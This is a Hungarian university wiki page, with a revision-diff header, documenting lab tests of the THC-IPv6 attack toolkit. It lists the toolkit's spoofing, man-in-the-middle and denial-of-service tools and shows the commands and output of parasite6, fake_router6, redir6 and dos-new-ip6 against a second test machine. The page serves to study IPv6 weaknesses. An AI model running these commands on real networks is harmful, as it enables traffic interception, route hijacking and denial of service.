Differences between revisions 5 and 6
Revision 5 as of 2008-01-15 08:01:55
Size: 6312
Comment:
Revision 6 as of 2008-01-15 08:06:07
Size: 6438
Comment:
Deletions are marked like this. Additions are marked like this.
Line 28: Line 28:
[[Képernyőképek]] [:HackScreenshots: Képernyőképek az eszközök használatáról]
Line 36: Line 36:
=== Parasite6 ===  === Parasite6 ===
Line 38: Line 38:

{{{
Line 47: Line 49:
}}}
Line 50: Line 53:
{{{
Line 59: Line 63:
}}}
Line 61: Line 65:
{{{
Line 64: Line 69:
}}}
Line 67: Line 72:
{{{
Line 72: Line 78:
}}}
Line 74: Line 80:
{{{
Line 76: Line 83:
}}}
Line 78: Line 85:
{{{
Line 85: Line 93:
}}}
Line 90: Line 98:
{{{
Line 96: Line 105:
Felvettem egy routot egy fec0::1:1 címre, ezt akarom majd eltéríteni. }}}
Felvéve egy routot egy fec0::1:1 címre, ezt akarjuk majd eltéríteni.
{{{
Line 98: Line 109:
}}}
Line 101: Line 113:
{{{
Line 106: Line 119:
}}}
Line 111: Line 125:

IPv6 specifikus hacking eszközök

A [http://freeworld.thc.org/thc-ipv6/ THC-IPv6] eszközkészlet célja különböző támadások megvalósítása, specifikusan az IPv6 protokollt célozva. A készlet a követekző eszközöket tartamazza:

  • alive6 - felderítő eszköz, adott címre válaszoló rendszerekhez

  • detect-new-ip6 - hálózathoz újonnan csatlakozó eszközök automatikus felderítése.

  • dos-new-ip6 - címütközés hamisítása és így az újonnan csatlakozó eszközök működésének megbénítása.

  • fake_advertiser6 - hirdetések hamisítása.

  • fake_mipv6 - mobil IP címek hamis kérése.

  • fake_mld6 - Multicas csoport üzenetek hamisítására

  • fake_router6 - Router üzenetek hamisítására, közbeékelődéses és forgalomelterelő támadásokhoz

  • parasite6 - ICMP6 neighbour solicitation üzenetek hamisítására, például beékelődéses támadások létrehozásához

  • redir6 - beékeléses támadás ICMP6 redirect üzenetek hamisításával

  • rsmurf6 - Távoli smurf támadás

  • sendpees6 - ND neighbour solicitation üzenetek generálás, a célpont CPU idejének fogyasztásához.

  • smurf6 - Helyi smirf támadás.

  • toobig6 - Hamis üzenetekkel MTU csökkentése.

A csomag telepítése

A teszt Debian Linux alatt történt, a telepítés csomagból történt. A következő lényeges csomagokat kellett telepíteni, az apt-get install ... csomagkezelő használatával: gcc, libc6, libc-dev, libpcap-dev, libssl-dev. Ezek után a THC forrásból fordítható.

THC tesztek

[:HackScreenshots: Képernyőképek az eszközök használatáról]

Alive6

./alive6 eth0 Alive: fe80:0000:0000:0000:020c:29ff:fed8:f478 Found 1 systems alive Sikeresen felismerte a másik Linux-os gép Link Local IP címét.

Parasite6

A spoofingot végző hoszt IP címei:

ip -6 addr
1: lo: <LOOPBACK,UP> mtu 16436
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP> mtu 1492 qlen 1000
    inet6 fec0::1/124 scope site
       valid_lft forever preferred_lft forever
    inet6 fe80::20c:29ff:fed8:f478/64 scope link
       valid_lft forever preferred_lft forever

Minden forgalom átirányítása saját maga felé, ezzel egyidőben a másik gépen ping6 forgalmat generalok, hogy legyen mit eltéríteni (ping6 fec0::3 -I eth0, ping6 fec0::4 -I eth0):

./parasite6 eth0
Remember to enable routing (ip_forwarding), you will denial service otherwise!
Started ICMP6 Neighbor Solitication Interceptor (Press Control-C to end) ...
Spoofed packet to fec0:0000:0000:0000:0000:0000:0000:0002 as fec0:0000:0000:0000:0000:0000:0000:0001
Spoofed packet to fe80:0000:0000:0000:0219:e0ff:fe14:6503 as fec0:0000:0000:0000:0000:0000:0000:0002
Spoofed packet to fe80:0000:0000:0000:020c:29ff:fed8:f478 as fe80:0000:0000:0000:0219:e0ff:fe14:6503
Spoofed packet to fe80:0000:0000:0000:0219:e0ff:fe14:6503 as fe80:0000:0000:0000:020c:29ff:fed8:f478
Spoofed packet to fec0:0000:0000:0000:0000:0000:0000:0002 as fec0:0000:0000:0000:0000:0000:0000:0003
Spoofed packet to fec0:0000:0000:0000:0000:0000:0000:0002 as fec0:0000:0000:0000:0000:0000:0000:0004

A másik gépen ezután több fals szomszéd is látszik:

ip -6 neigh
fec0::4 dev eth0 lladdr 00:19:e0:14:65:03 STALE
fec0::3 dev eth0 lladdr 00:19:e0:14:65:03 STALE

Fake_router6

Előtte:

ip -6 route
fe80::/64 dev eth0  metric 256  expires 21332474sec mtu 1492 advmss 1432 hoplimit 4294967295
fec0::/124 dev eth0  metric 256  expires 21332933sec mtu 1492 advmss 1432 hoplimit 4294967295
ff00::/8 dev eth0  metric 256  expires 21332474sec mtu 1492 advmss 1432 hoplimit 4294967295
unreachable default dev lo  proto none  metric -1  error -101 hoplimit 255

Jöhet a fals route beinjektálása:

./fake_router6 eth0 fe80::1 2001:2001::/32 1500
Starting to advertise router fe80::1 (Press Control-C to end) ...

Ezután a másik gép routing táblája:

ip -6 route
2001:2001::/32 dev eth0  proto kernel  metric 256  expires 8590469sec mtu 1492 advmss 1432 hoplimit 4294967295
fe80::/64 dev eth0  metric 256  expires 21332362sec mtu 1492 advmss 1432 hoplimit 4294967295
fec0::/124 dev eth0  metric 256  expires 21332821sec mtu 1492 advmss 1432 hoplimit 4294967295
ff00::/8 dev eth0  metric 256  expires 21332362sec mtu 1492 advmss 1432 hoplimit 4294967295
default via fe80::1 dev eth0  proto kernel  metric 1024  expires 65538sec mtu 1492 advmss 1432 hoplimit 255
unreachable default dev lo  proto none  metric -1  error -101 hoplimit 255

Látható, hogy valóban bekerült az új routing bejegyzés.

Redir6

Előtte:

ip -6 route
fe80::/64 dev eth0  metric 256  expires 21331811sec mtu 1492 advmss 1432 hoplimit 4294967295
fec0::/124 dev eth0  metric 256  expires 21332270sec mtu 1492 advmss 1432 hoplimit 4294967295
fec0::1:1 via fec0::5 dev eth0  metric 1024  expires 21334372sec mtu 1492 advmss 1432 hoplimit 4294967295
ff00::/8 dev eth0  metric 256  expires 21331811sec mtu 1492 advmss 1432 hoplimit 4294967295
unreachable default dev lo  proto none  metric -1  error -101 hoplimit 255

Felvéve egy routot egy fec0::1:1 címre, ezt akarjuk majd eltéríteni.

./redir6 eth0 fec0::2 fec0::1:1 fec0::5 fec0::1

Nem lett új route bejegyzés, de érdemes megnézni a capture fájlt. Valószínűleg a routerek hiánya miatt nem sikerült eltéríteni.

Dos-new-ip6

./dos-new-ip6 eth0
Started ICMP6 DAD Denial-of-Service (Press Control-C to end) ...
Spoofed packet for existing ip6 as fe80:0000:0000:0000:0000:0000:0000:0001
Spoofed packet for existing ip6 as fe80:0000:0000:0000:0000:0000:0000:0002
Spoofed packet for existing ip6 as fe80:0000:0000:0000:020c:29ff:fed8:f478

Valóban nem enged új interfészeket feljönni a linkre.

A detect-new-ip6 gyakoraltilag ugyanazt csinálja, mint az alive6.

A smurf6 attack-ot nem lehet egy ilyen kicsi hálózat esetén kipróbálni (tulajdonképpen két ipv6 eszközvolt a próba során összekötve). A Debian nem reagált sem a smurf, sem a sendpees támadásra, csak a kérések láthatóak a vonalon. Az önkéntes Neighbor Advertisementre a másik gép nem reagál, nem írja be a szomszédok közé a hírdetett IP-t.

Campus6: IPv6hackingTools (last edited 2008-04-10 15:29:39 by localhost)